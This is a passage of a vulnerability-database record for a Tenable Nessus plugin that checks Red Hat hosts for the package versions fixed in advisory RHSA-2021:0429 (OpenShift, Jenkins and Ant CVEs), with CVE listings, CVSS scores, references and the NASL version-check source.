(!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'conmon / jenkins / machine-config-daemon / openshift-ansible / etc');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/a:redhat:openshift:4.5::el8", "cpe:/a:redhat:openshift:4.7", "cpe:/a:redhat:openshift:4.3::el7", "cpe:/a:redhat:openshift:4.4", "cpe:/a:redhat:openshift:4.4::el7", "cpe:/a:redhat:openshift:4.6::el7", "p-cpe:/a:redhat:enterprise_linux:machine-config-daemon", "cpe:/a:redhat:openshift:4.3", "cpe:/a:redhat:openshift:4.5", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/a:redhat:openshift:4.2::el8", "cpe:/a:redhat:openshift:4.1", "cpe:/a:redhat:openshift:4.7::el7", "cpe:/a:redhat:openshift:4.1::el7", "cpe:/a:redhat:openshift:4.6::el8", "cpe:/a:redhat:openshift:4.4::el8", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:runc", "cpe:/a:redhat:openshift:4.3::el8", "cpe:/a:redhat:openshift:4.2", "p-cpe:/a:redhat:enterprise_linux:conmon", "cpe:/a:redhat:openshift:4.6", "cpe:/a:redhat:openshift:4.5::el7", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "cpe:/a:redhat:openshift:4.7::el8", "cpe:/a:redhat:openshift:4.2::el7", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "cpe:/o:redhat:enterprise_linux:8", "cpe:/a:redhat:openshift:4.1::el8"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-07T06:00:11", "differentElements": ["cpe", "sourceData"], "edition": 2}, {"bulletin": {"id": "REDHAT-RHSA-2021-0429.NASL", "hash": "7980b14a45db5af710c6aebc89712c310b17bd61cf215896bd6246d24e5f6ac0", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.0, "vector": "AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147015", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2021-21610", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925143", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925156", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://bugzilla.redhat.com/1921322", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925160", "https://cwe.mitre.org/data/definitions/22.html", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://access.redhat.com/security/cve/CVE-2021-21615", "https://cwe.mitre.org/data/definitions/502.html", "https://bugzilla.redhat.com/1837444", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1925161", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1925151", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/errata/RHSA-2021:0429", "https://access.redhat.com/security/cve/CVE-2021-21605"], "cvelist": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21604", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-03-25T13:48:58", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2021-03-25T13:48:58", "references": [{"idList": ["USN-4380-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"], "type": "openvas"}, {"idList": ["PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "FEDORA_2020-2640AA4E19.NASL", "JENKINS_2_276.NASL", "FREEBSD_PKG_425F214388764B0AAF84E0238C5C2062.NASL"], "type": "nessus"}, {"idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"], "type": "github"}, {"idList": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21604", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611"], "type": "cve"}, {"idList": ["OPENSUSE-SU-2020:1022-1"], "type": "suse"}, {"idList": ["FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF"], "type": "fedora"}, {"idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"], "type": "freebsd"}, {"idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020", "ORACLE:CPUJAN2021"], "type": "oracle"}, {"idList": ["ASA-202005-15", "ASA-202101-41", "ASA-202012-5"], "type": "archlinux"}, {"idList": ["GLSA-202007-34", "GLSA-202011-18"], "type": "gentoo"}, {"idList": ["RHSA-2021:0429", "RHSA-2020:4961", "RHSA-2021:0637", "RHSA-2021:0423", "RHSA-2020:4960", "RHSA-2021:0719", "RHSA-2020:2618"], "type": "redhat"}], "rev": 2}, "score": {"modified": "2021-03-25T13:48:58", "rev": 2, "value": 6.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147015", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0429. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147015);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/24\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-11979\",\n \"CVE-2021-21602\",\n \"CVE-2021-21603\",\n \"CVE-2021-21604\",\n \"CVE-2021-21605\",\n \"CVE-2021-21606\",\n \"CVE-2021-21607\",\n \"CVE-2021-21608\",\n \"CVE-2021-21609\",\n \"CVE-2021-21610\",\n \"CVE-2021-21611\",\n \"CVE-2021-21615\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0429\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1921322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21605\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(20, 22, 59, 79, 377, 502, 770, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:conmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:machine-config-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_4_1_el7': [\n 'rhel-7-server-ose-4.1-debug-rpms',\n 'rhel-7-server-ose-4.1-rpms',\n 'rhel-7-server-ose-4.1-source-rpms'\n ],\n 'openshift_4_1_el8': [\n 'rhocp-4.1-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.1-for-rhel-8-x86_64-rpms',\n 'rhocp-4.1-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_2_el7': [\n 'rhel-7-for-system-z-ose-4.2-debug-rpms',\n 'rhel-7-for-system-z-ose-4.2-rpms',\n 'rhel-7-for-system-z-ose-4.2-source-rpms',\n 'rhel-7-server-ose-4.2-debug-rpms',\n 'rhel-7-server-ose-4.2-rpms',\n 'rhel-7-server-ose-4.2-source-rpms'\n ],\n 'openshift_4_2_el8': [\n 'rhocp-4.2-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.2-for-rhel-8-s390x-rpms',\n 'rhocp-4.2-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_3_el7': [\n 'rhel-7-for-system-z-ose-4.3-debug-rpms',\n 'rhel-7-for-system-z-ose-4.3-rpms',\n 'rhel-7-for-system-z-ose-4.3-source-rpms',\n 'rhel-7-server-ose-4.3-debug-rpms',\n 'rhel-7-server-ose-4.3-rpms',\n 'rhel-7-server-ose-4.3-source-rpms'\n ],\n 'openshift_4_3_el8': [\n 'rhocp-4.3-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.3-for-rhel-8-s390x-rpms',\n 'rhocp-4.3-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_4_el7': [\n 'rhel-7-for-system-z-ose-4.4-debug-rpms',\n 'rhel-7-for-system-z-ose-4.4-rpms',\n 'rhel-7-for-system-z-ose-4.4-source-rpms',\n 'rhel-7-server-ose-4.4-debug-rpms',\n 'rhel-7-server-ose-4.4-rpms',\n 'rhel-7-server-ose-4.4-source-rpms'\n ],\n 'openshift_4_4_el8': [\n 'rhocp-4.4-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.4-for-rhel-8-s390x-rpms',\n 'rhocp-4.4-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_5_el7': [\n 'rhel-7-for-system-z-ose-4.5-debug-rpms',\n 'rhel-7-for-system-z-ose-4.5-rpms',\n 'rhel-7-for-system-z-ose-4.5-source-rpms',\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_6_el7': [\n 'rhel-7-for-system-z-ose-4.6-rpms',\n 'rhel-7-server-ose-4.6-debug-rpms',\n 'rhel-7-server-ose-4.6-rpms',\n 'rhel-7-server-ose-4.6-source-rpms'\n ],\n 'openshift_4_6_el8': [\n 'rhocp-4.6-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.6-for-rhel-8-s390x-rpms',\n 'rhocp-4.6-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_7_el7': [\n 'rhel-7-for-system-z-ose-4.7-rpms',\n 'rhel-7-server-ose-4.7-debug-rpms',\n 'rhel-7-server-ose-4.7-rpms',\n 'rhel-7-server-ose-4.7-source-rpms'\n ],\n 'openshift_4_7_el8': [\n 'rhocp-4.7-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.7-for-rhel-8-s390x-rpms',\n 'rhocp-4.7-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0429');\n}\n\npkgs = [\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'jenkins-2.263.3.1612434332-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 